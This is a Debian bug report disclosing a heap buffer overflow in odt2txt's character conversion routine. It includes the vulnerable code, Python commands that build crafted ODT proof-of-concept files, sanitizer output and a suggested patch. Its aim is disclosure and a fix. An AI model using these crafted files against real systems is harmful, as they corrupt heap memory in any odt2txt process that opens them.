Package: odt2txt
Version: 0.5-7
Severity: normal
Tags: upstream

Dear Maintainer,

## Summary

A crafted ODT file triggers an unbounded heap buffer overflow in
odt2txt's character encoding conversion.  The EILSEQ error handler in
conv() (odt2txt.c:296-301) writes to the output buffer and decrements
outleft without first checking that output space remains.  When iconv
fills the output buffer exactly and then encounters an invalid byte,
outleft is zero; the handler writes one byte past the allocation and
wraps outleft to SIZE_MAX, disabling all subsequent growth checks.

Every remaining input byte then overflows the heap.

## Affected code

odt2txt.c, conv(), the EILSEQ/EINVAL error handler:

    } else if ((errno == EILSEQ) || (errno == EINVAL)) {
        char skip = 1;
        if ((unsigned char)*doc > 0x80)
            skip += utf8_length[(unsigned char)*doc - 0x80];
        doc += skip;
        inleft -= skip;

        *out = '?';    /* no check that outleft > 0 */
        out++;
        outleft--;     /* wraps size_t 0 to SIZE_MAX */
        continue;
    }

The output buffer is allocated as malloc(4096) at line 268.  The
growth check (line 272: `if (!outleft)`) runs only at the top of each
loop iteration, before iconv is called.  When iconv produces exactly
4096 bytes of valid output and then returns EILSEQ for the next
(invalid) input byte, outleft is zero and the handler runs without
passing through the growth check.  By the time control returns to
the check, outleft has already wrapped to SIZE_MAX, so the check
never fires again.
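
The wrap can be reproduced in isolation.  The following is a minimal
sketch of the handler's bookkeeping only, with no buffer involved; the
helper names are hypothetical and do not appear in odt2txt.c.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: the handler's `outleft--` with no prior check. */
size_t outleft_after_handler(size_t outleft)
{
    return outleft - 1;    /* size_t is unsigned, so 0 - 1 wraps to SIZE_MAX */
}

/* Hypothetical helper: the loop's growth test, `if (!outleft)`. */
int growth_check_fires(size_t outleft)
{
    return !outleft;
}

/* Walks through the failure mode starting from a full buffer. */
void demo_wrap(void)
{
    size_t outleft = 0;
    assert(growth_check_fires(outleft));       /* would have grown the buffer */
    outleft = outleft_after_handler(outleft);  /* but the handler runs first */
    assert(outleft == SIZE_MAX);
    assert(!growth_check_fires(outleft));      /* the check can no longer fire */
}
```

Once outleft holds SIZE_MAX, iconv is also told that effectively
unlimited output space is available, so it never reports E2BIG either.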

## Trigger conditions

1. The input to conv() must contain an invalid UTF-8 byte at a
   position that is a multiple of 4096 (the alloc_step) in the
   output stream.

2. glibc's iconv must return EILSEQ rather than E2BIG when the
   output buffer is full and the next input byte is invalid.  glibc
   checks input validity before output space, so this should hold
   across glibc versions (verified on 2.39).  glibc is the libc used
   by Debian.

Condition 1 is met by placing the invalid byte at an exact offset
in the ODT's content.xml.  The format_doc() and wrap() pipeline is
deterministic for a given input, so the offset can be precomputed.
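
Condition 2 can be checked on a given system with a small probe.  This
is a sketch under assumptions, not code from odt2txt: the function name
is hypothetical, and it assumes the local iconv provides the "UTF-8"
and "US-ASCII" converters.

```c
#include <assert.h>
#include <errno.h>
#include <iconv.h>
#include <stddef.h>
#include <string.h>

/*
 * Hypothetical probe: convert n valid bytes followed by one invalid
 * byte (0xfe) into an output buffer of exactly n bytes.  Returns the
 * errno reported by iconv (or -1 if the converter could not be opened)
 * and stores the remaining output space in *outleft_after.
 */
int probe_full_buffer(size_t n, size_t *outleft_after)
{
    char in[65], out[64];
    assert(n >= 1 && n <= sizeof(out));

    memset(in, 'A', n);
    in[n] = (char)0xfe;            /* 0xfe never appears in valid UTF-8 */

    iconv_t ic = iconv_open("US-ASCII", "UTF-8");
    if (ic == (iconv_t)-1)
        return -1;

    char *inp = in, *outp = out;
    size_t inleft = n + 1, outleft = n;

    errno = 0;
    size_t r = iconv(ic, &inp, &inleft, &outp, &outleft);
    int err = (r == (size_t)-1) ? errno : 0;   /* save before iconv_close */

    iconv_close(ic);
    *outleft_after = outleft;
    return err;
}
```

A return value of EILSEQ together with *outleft_after == 0 is the state
in which the handler writes out of bounds; E2BIG would mean the growth
path runs first and the overflow is not reached this way.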

## Reproduction

Generate the crafted ODT (requires Python 3):

    python3 -c '
    import zipfile
    payload = b"A" * 4095 + b"\xfe" + b"B"
    xml = (
        b"<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
        b"<office:document-content"
        b" xmlns:office=\"urn:oasis:names:tc:opendocument:xmlns:office:1.0\""
        b" xmlns:text=\"urn:oasis:names:tc:opendocument:xmlns:text:1.0\">"
        b"<office:body><office:text>"
        b"<text:p text:style-name=\"Standard\">" + payload + b"</text:p>"
        b"</office:text></office:body></office:document-content>"
    )
    with zipfile.ZipFile("poc.odt", "w") as z:
        z.writestr("content.xml", xml)
    '

Build with AddressSanitizer and run:

    cc -fsanitize=address -g -O0 -o odt2txt \
       odt2txt.c regex.c mem.c strbuf.c \
       kunzip/fileio.c kunzip/zipfile.c -lz

    ./odt2txt --encoding=us-ascii poc.odt

Result:

    ==PID==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x...
    WRITE of size 1 at 0x... thread T0
        #0 in conv odt2txt.c:298
        #1 in main odt2txt.c:578
    0x... is located 0 bytes after 4096-byte region [0x...,0x...)
    allocated by thread T0 here:
        #0 in malloc
        #1 in conv odt2txt.c:268

The issue can also be verified on a stock Debian build, where Valgrind
reports an invalid write:

    ==2464380== Memcheck, a memory error detector
    ==2464380== Copyright (C) 2002-2022, and GNU GPL'd, by Julian Seward et al.
    ==2464380== Using Valgrind-3.19.0 and LibVEX; rerun with -h for copyright info
    ==2464380== Command: odt2txt --encoding=us-ascii /home/mstevens/poc-large.odt
    ==2464380==
    ==2464380== Invalid write of size 1
    ==2464380==    at 0x10A83C: ??? (in /usr/bin/odt2txt.odt2txt)
    ==2464380==    by 0x48A1249: (below main) (libc_start_call_main.h:58)
    ==2464380==  Address 0x4a5f040 is 0 bytes after a block of size 4,096 alloc'd
    ==2464380==    at 0x48417B4: malloc (vg_replace_malloc.c:381)
    ==2464380==    by 0x10A750: ??? (in /usr/bin/odt2txt.odt2txt)
    ==2464380==    by 0x48A1249: (below main) (libc_start_call_main.h:58)

The overflow is unbounded: replacing the trailing "B" in the payload
with N bytes of content causes N bytes of heap overwrite beyond the
4096-byte buffer.  This can be verified observationally without ASan:

    python3 -c '
    import zipfile
    payload = b"A" * 4095 + b"\xfe" + b"A" * (2*1024*1024)
    xml = (
        b"<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
        b"<office:document-content"
        b" xmlns:office=\"urn:oasis:names:tc:opendocument:xmlns:office:1.0\""
        b" xmlns:text=\"urn:oasis:names:tc:opendocument:xmlns:text:1.0\">"
        b"<office:body><office:text>"
        b"<text:p text:style-name=\"Standard\">" + payload + b"</text:p>"
        b"</office:text></office:body></office:document-content>"
    )
    with zipfile.ZipFile("poc-large.odt", "w") as z:
        z.writestr("content.xml", xml)
    '

    make clean && make
    ./odt2txt --encoding=us-ascii poc-large.odt | wc -c

Expected output is ~4100 bytes; actual output is 2,101,251 bytes.
The excess comes from conv() writing 2MB of iconv output past the
4096-byte buffer into the heap, then strbuf_slurp_n treating the
corrupted out-pointer distance as the output length.

## Impact

An attacker who can cause odt2txt to process a crafted ODT file
achieves unbounded heap corruption.  The overflow writes iconv-
converted content (attacker-influenced but not fully controlled)
over adjacent heap chunks.

On a stock Debian build, the overflow does not produce a crash in
this particular program because the output buffer happens to be
adjacent to glibc's top chunk, and glibc's realloc expands into it
without validating the corrupted metadata.  A crash is reliably
produced under AddressSanitizer.  In a library or daemon context
where the allocation is not top-chunk-adjacent, the corrupted heap
metadata would cause glibc to abort or segfault on the next
malloc/realloc/free.

## Additional issues in the same error handler

The same EILSEQ handler has a second bug: `inleft -= skip` can
underflow.  skip is 1 + utf8_length[byte - 0x80], which can be up
to 6.  If fewer than skip bytes remain in the input, inleft (size_t)
wraps to near SIZE_MAX and the loop reads far past the input buffer.
This is harder to reach through the normal ODT pipeline because
wrap() always appends trailing newlines, but it compounds the
severity of the error handler's missing bounds checks.
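
To illustrate the size of the wrap, here is a minimal sketch of the
input-side arithmetic alone.  The function names and the example values
(2 bytes remaining, skip of 6) are hypothetical and chosen only for
illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Unchecked form, as in the current handler: wraps when skip > inleft. */
size_t inleft_unchecked(size_t inleft, size_t skip)
{
    return inleft - skip;
}

/* Clamped form: never consumes more than what remains. */
size_t inleft_clamped(size_t inleft, size_t skip)
{
    if (skip > inleft)
        skip = inleft;
    return inleft - skip;
}

void demo_inleft(void)
{
    /* 2 bytes left, handler asks to skip 6: 2 - 6 wraps to SIZE_MAX - 3. */
    assert(inleft_unchecked(2, 6) == SIZE_MAX - 3);
    /* With the clamp, the remaining count stops at zero and the loop ends. */
    assert(inleft_clamped(2, 6) == 0);
}
```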

## Suggested fix

Check outleft before writing in the EILSEQ/EINVAL handler, and
clamp skip to inleft:

    } else if ((errno == EILSEQ) || (errno == EINVAL)) {
        char skip = 1;
        if ((unsigned char)*doc > 0x80)
            skip += utf8_length[(unsigned char)*doc - 0x80];
    +   if ((size_t)skip > inleft)
    +       skip = inleft;
        doc += skip;
        inleft -= skip;

    +   if (!outleft) {
    +       outlen += alloc_step; outleft += alloc_step;
    +       yrealloc_buf(&outbuf, &out, outlen);
    +   }
        *out = '?';
        out++;
        outleft--;
        continue;
    } 
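
The check-before-write pattern in the patch can also be exercised
outside odt2txt.  The sketch below is a hypothetical stand-in, not the
project's code: it uses plain realloc instead of yrealloc_buf, and the
struct and function names are invented for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>

#define ALLOC_STEP 4096   /* assumption: mirrors the 4096-byte step above */

/* Hypothetical stand-in for conv()'s output state. */
struct outbuf {
    char  *base;   /* start of the allocation */
    char  *out;    /* next write position */
    size_t len;    /* total allocated bytes */
    size_t left;   /* bytes still free */
};

/* Grow by ALLOC_STEP when full, then append one byte.  Returns 0 on success. */
int outbuf_put(struct outbuf *b, char c)
{
    if (b->left == 0) {
        size_t used = b->base ? (size_t)(b->out - b->base) : 0;
        char *p = realloc(b->base, b->len + ALLOC_STEP);
        if (p == NULL)
            return -1;
        b->base  = p;
        b->out   = p + used;   /* re-derive: realloc may move the block */
        b->len  += ALLOC_STEP;
        b->left += ALLOC_STEP;
    }
    *b->out++ = c;
    b->left--;                 /* safe: left is at least 1 here */
    return 0;
}
```

Because the space check sits directly in front of the write, the
decrement can no longer run with left == 0, whichever path led to the
write.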

I have already contacted [email protected], who recommended filing
the issue publicly.

-- System Information:
Debian Release: 12.13
  APT prefers oldstable-updates
  APT policy: (500, 'oldstable-updates'), (500, 'oldstable-security'), (500, 'oldstable')
Architecture: amd64 (x86_64)

Kernel: Linux 6.1.0-40-amd64 (SMP w/2 CPU threads; PREEMPT)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8), LANGUAGE not set
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages odt2txt depends on:
ii  libc6   2.36-9+deb12u13
ii  zlib1g  1:1.2.13.dfsg-1

odt2txt recommends no packages.

odt2txt suggests no packages.

-- debconf-show failed
